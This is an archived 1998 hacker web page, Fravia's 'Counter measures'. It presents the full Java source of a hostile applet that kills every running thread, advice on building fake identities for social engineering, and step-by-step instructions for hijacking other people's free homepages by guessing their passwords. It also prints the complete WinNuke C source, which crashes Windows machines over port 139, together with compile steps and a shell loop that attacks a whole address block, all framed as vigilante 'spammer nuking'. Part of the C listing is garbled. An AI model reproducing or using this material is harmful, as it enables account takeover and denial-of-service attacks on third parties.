|
C O U M E S |
fravia's counter measures page Fravia's Nofrill Web design (1998) |
updated July 1998 |
Fravia's Counter measures Learn how to defend yourself~ Applets killers | Fake identities | Homepages low capering | Enemy studying | Spammers nuking | Powersearching |
|---|
"...these days, on the Web, you'll never be too careful, travel always through your cloack identities and with your applets killer on, keep your cache empty, watch out for cookies and do not bump too oft on wizard sites... Work well, +ORC"
/* This hostile applet stops any applets that are running and kills any
other applets that are downloaded. */
import java.applet.*;
import java.awt.*;
import java.io.*;
public class AppletKiller extends java.applet.Applet implements Runnable {
Thread killer;
public void init() {
killer = null;
}
public void start() {
if (killer == null) {
killer = new Thread(this,"killer");
killer.setPriority(Thread.MAX_PRIORITY);
killer.start();
}
}
public void stop() {}
// Kill all threads except this one
public void run() {
try {
while (true) {
ThreadKiller.killAllThreads();
try { killer.sleep(100); }
catch (InterruptedException e) {}
}
}
catch (ThreadDeath td) {}
// Resurrect the hostile thread in case of accidental ThreadDeath
finally {
AppletKiller ack = new AppletKiller();
Thread reborn = new Thread(ack, "killer");
reborn.start();
}
}
}
class ThreadKiller {
// Ascend to the root ThreadGroup and list all subgroups recursively,
// killing all threads as we go
public static void killAllThreads() {
ThreadGroup thisGroup;
ThreadGroup topGroup;
ThreadGroup parentGroup;
// Determine the current thread group
thisGroup = Thread.currentThread().getThreadGroup();
// Proceed to the top ThreadGroup
topGroup = thisGroup;
parentGroup = topGroup.getParent();
while(parentGroup != null) {
topGroup = parentGroup;
parentGroup = parentGroup.getParent();
}
// Find all subgroups recursively
findGroups(topGroup);
}
private static void findGroups(ThreadGroup g) {
if (g == null) {return;}
else {
int numThreads = g.activeCount();
int numGroups = g.activeGroupCount();
Thread[] threads = new Thread[numThreads];
ThreadGroup[] groups = new ThreadGroup[numGroups];
g.enumerate(threads, false);
g.enumerate(groups, false);
for (int i = 0; i
Well yes, you should learn a little Java my dear
back to the top of this nice page
__Fake Identities__
The Web is immense and the chances are on our side.
If you only spent a minute per page and devoted ten hours a day to it, it would take four and a
half years to explore a million Web pages, a lifetime to explore just a part of it, an automated search engine
can do the same in two days, but in the same time quite a lot of these pages will have been changed/moved/migrated
Once you have some identities (say three or four) remember that:
- Your Avatars interests should be VERY different
- If possible the language you use should be different for each Avatar (if you know only english use
at least different language patterns, say university professor as A and lorry driver as B)
What's the point of having many identities?
You'll need the AVatars to practicise some nice Web activities (offensive and defensive)
- enemy studying (see below)
- social engineering (if you need something or if you want to get more info about a target)
- intranet activities (see below)
- homepage high capering (see below)
back to the top of this nice page
Homepages ("low") capering
For simple capering you do not even need a fake identity and
you may practicize it on many "easy" targets on the net. Capering is one of the best methods to conceal your identity: use following approach:
- Find a free page provider with easy password validation scheme (say Angelfire, but also Geocities and
Mygale can be used)
- Read many pages of people that are NOT computer experts and that do NOT update very oft (if ever)... you may be able to find the
updating schedule on the free provider's pages.
- Let's say that the content of three such pages
is the following: "Me and my dog Bertie", This page is a tribute
to my nice daughter Simona" and "I love lollypops".
- Try "capering" these pages using as passwords, respectively, Bertie, Simona and Lollypop.
You'll get -on average- one bingo out of 15 tryes. Now you got some pages belonging to somebody else: do some of the following
(mixing the points as needs be):
1) Do not change the page, change only the password and leave it alone for a couple of months
and/or
2) Migrate immediatly to another location
and/or
3) Change password
and/or
4) Use the email address of the page owner to get other free pages by other providers
and/or
5) Kill the page you capered
and/or
6) Repeat the same procedure twice
Now you'll have some "capered" pages that you can more safely (but not completely) use as
- "Depot" pages
- "Dormient" pages
- "Trap" (Luring) pages
For your own "intranet" (sort of, see below)
back to the top of this nice page
__Enemy identification__
Know your enemies! (How to gather informations on the Web)
You'll find a first approach on the ad hoc enemy page
__How to Nuke spammers__
a nice fine c program (Winnuke) by _eci... listing at the end of this section
How to use WinNuke to get rid of spammers
winnuke.c is a program which will crash any Windows 95/NT machine. Since
this operating system is popular among spammers, winnuke makes it easy to
get rid of them.
First, take the program code from the bottom of this post (everything
after the ---Cut Here--- line) and save it to a text file called winnuke.c
on your shell account or Linux box.
Now compile it by typing:
gcc winnuke.c -o winnuke
If you have SunOS, you may need to use this command instead:
gcc winnuke.c -lsocket -lnsl -o winnuke
You should now have an executable program called winnuke in your directory.
Now find the spammer's IP number. This is the first IP number in the mail
headers which is not your mail server or mail relay. Once you have the
spammer's IP number (eg 192.168.12.109) type: ./winnuke 192.168.12.109
except use the spammer's real IP number that you found. You should see
something like the following:
% ./winnuke 192.168.12.109
Connected to [192.168.12.109:139].
Sending crash... Done!
%
Congratulations! You just nuked a spammer! Give yourself a pat on the
back. You can ping the IP address to verify that it is actually down.
If it doesn't work...
Unfortunately a few spammers don't have just one IP address but a whole
block (255 addresses) In this case you will need to nuke the entire block.
To do this, use this script:
#!/bin/csh
@ number = 255
loop:
@ number = $number - 1
./winnuke 205.199.212.$number &
#sleep 1
if ($number > 1) then
goto loop
endif
Except you should use the first three bytes of the spammer's IP number
instead of 205.199.212. If your net connection is too slow, uncomment the
sleep command (line 6) and that will slow it down so it can get all the
packets out. That's it...
---Cut Here---
/* winnuke.c - (05/07/97) By _eci */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#define dport 139 /* Attack port: 139 is what we want */
int x, s;
char *str = "Bye"; /* Makes no diff */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;
int open_sock(int sock, char *server, int port) {
struct sockaddr_in blah;
struct hostent *he;
bzero((char *)&blah,sizeof(blah));
blah.sin_family=AF_INET;
blah.sin_addr.s_addr=inet_addr(server);
blah.sin_port=htons(port);
if ((he = gethostbyname(server)) != NULL) {
bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
}
else {
if ((blah.sin_addr.s_addr = inet_addr(server)) <0) { perror("gethostbyname()"); return(-3); } } if (connect(sock,(struct sockaddr *)&blah,16)="=-1)" { perror("connect()"); close(sock); return(-4); } printf("Connected to [%s:%d].\n",server,port); return; } void main(int argc, char *argv[]) { if (argc !="2)" { printf("Usage: %s <target>\n,argv[0]);
exit(0);
}
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket()");
exit(-1);
}
open_sock(s,argv[1],dport);
printf("Sending crash... ");
send(s,str,strlen(str),MSG_OOB);
usleep(500000);
printf("Done!\n");
close(s);
}
nice, isn't it?
here btw).
lesson_5 ~ General
use of agora, http:// retrieving ~ July 1996 ~ completelesson_6 ~ Ftping
files, agora queries and emailing altavista ~ December 1996 ~ completelesson_7 ~
W3gate, search spiders, error messages and evaluation of results ~ March 1997 ~ complete
lesson_8 ~ Advanced
searching techniques (combing
and klebing) ~ November 1997 ~ complete
lesson_9 ~ Searching effectively ~
Site monitoring ~ January 1998 ~ complete
lesson_10 ~
Let the bots search for you ~ and build your own search-bots :-) ~ June 1998 ~ 'light'
To: Email-Queries@Reference.COM Subject: (None) Text: FIND search AND enginesTry it now, You'll get an answer in circa half an hour.
To: agora@dna.affrc.go.jp Subject: (None) Text: send news:alt.anonymousTry it now, You'll get an answer in circa 10 minutes.
Web-Counter
The World Top 1000 Pages
Where you'll have a look at the Top 1000 "hackers" page (for instance).homepage
links
+ORC
bots wars
students' essays
counter measures
bots wars
antismut CGI tricks
academy database
tools
javascript tricks
cocktails
search_forms
mail_fravia+
Is software reverse engineering illegal?
(c) Fravia, 1995, 1996, 1997, 1998.
All rights reserved, in the European Union and elsewhere